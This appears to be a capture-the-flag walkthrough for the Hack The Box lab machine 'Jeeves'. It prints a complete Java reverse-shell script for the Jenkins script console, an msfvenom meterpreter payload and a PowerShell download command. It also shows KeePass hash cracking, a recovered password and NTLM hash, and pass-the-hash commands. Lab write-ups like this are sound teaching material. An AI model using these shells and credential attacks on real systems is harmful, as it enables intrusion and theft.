Capture The FlagsHackTheBox

Hack the Box – Jeeves Walkthrough

Today, we’re going to solve another CTF machine “Jeeves”. It is now retired box and can be accessible to VIP member.


  • Target OS: Windows
  • IP Address:
  • Difficulty: Medium


  • Getting user
  • Getting root


As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -p 1-65535 -T4 -A -v

Enumerating Port 80

Nmap reveals IIS httpd 10.0 running on port 80 with a search page showing ask jeeves.

If you check page source there’s an error.html page which just has jeeves.PNG image.

This image reveals some of the information which might help us in exploiting or doing priv esc on the box.

Enumerating Port 50000

Nmap reveals Jetty service running on port 50000 and if we browse the page

Let’s run the dirbuster to see if there’s anything hidden.

We found /askjeeves and let’s take a look at it.


If we google about Jenkins exploits we found we can use the Jenkins-CI Groovy script console to execute OS commands using Java.

Reverse Shell:

Manage Jenkins > Script Console

Reverse Shell

String host="";
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Click Run and Start the listener.

Since, we got the low privilege shell let’s try upgrading it through meterpreter.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1338 -f exe > shell.exe

Using Powershell to transfer our generated shell.exe file targeted machine.

powershell "(new-object System.Net.WebClient).Downloadfile('', 'shell.exe')"

After running the powershell and executing shell.exe we got meterpreter session.

We can find user.txt under C:\Users\kohsuke\Desktop

Privilege Escalation

Method 1

We start by gathering basic information about our targeted system so let’s check systeminfo first.

Copy all this information into local file named systeminfo.txt. Now we’re gonna run windows exploit suggester.

python --update
python --database 2019-08-01-mssb.xls --systeminfo systeminfo.txt

The machine is vulnerable with MS16-075 (RottenPotato)

Abusing Token Privileges For Windows Local Privilege Escalation

Currently there’s no Impersonation Tokens available let’s run the RottenPotato.exe again.

There you go!

impersonate_token "NT AUTHORITY\\SYSTEM"


Method 2

There’s a file CEH.kdbx under C:\Users\kohsuke\Documents.

After downloading a file we had to make sure of the file type.

This reveals Keepass password database file type.

Open KeePass file.

keepassx CEH.kdbx

This file is protected with a password but we know how to get it 🙂

There’s a pre-installed program in Kali named keepass2john.

keepass2john CEH.kdbx > key


Let’s crack the hash key.

Cracking Has Using John

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt key

Password: moonshine1

Let’s open our keepass file.

There’s bunch of data to be noted upon checking each of them we found backup stuff revealing critical information.

NTLM Hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

The SMB service is running on the targeted machine we can attempt to authenticate to the system using password spray attack or pass-the-hash attack.

Here’s the remaining content of keepass file.


But we found something interesting inside Backup Stuff.

NTLM Hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

The SMB service is running on the targeted machine we can attempt to authenticate to the system using password spray attack or pass-the-hash attack.

crackmapexec smb -u Administrator -p passwords.txt --lusers
crackmapexec smb -u Administrator -H hash.txt --lusers

Metasploit PSEXEC Module

Module: exploit/windows/smb/psexec

Now let’s run it!

And we’re NT Authority.

Now let’s look for the flag.

dir /a will show all the hidden files on the system and dir /R will show the alternative data stream.

The hm.txt:root.txt:$DATA means that root.txt is inside the alternative data stream of hm.txt

To read the root.txt more < hm.txt:root.txt:$DATA

Noor Qureshi

Experienced Founder with a demonstrated history of working in the computer software industry. Skilled in Network Security and Information Security.

Related Articles

Back to top button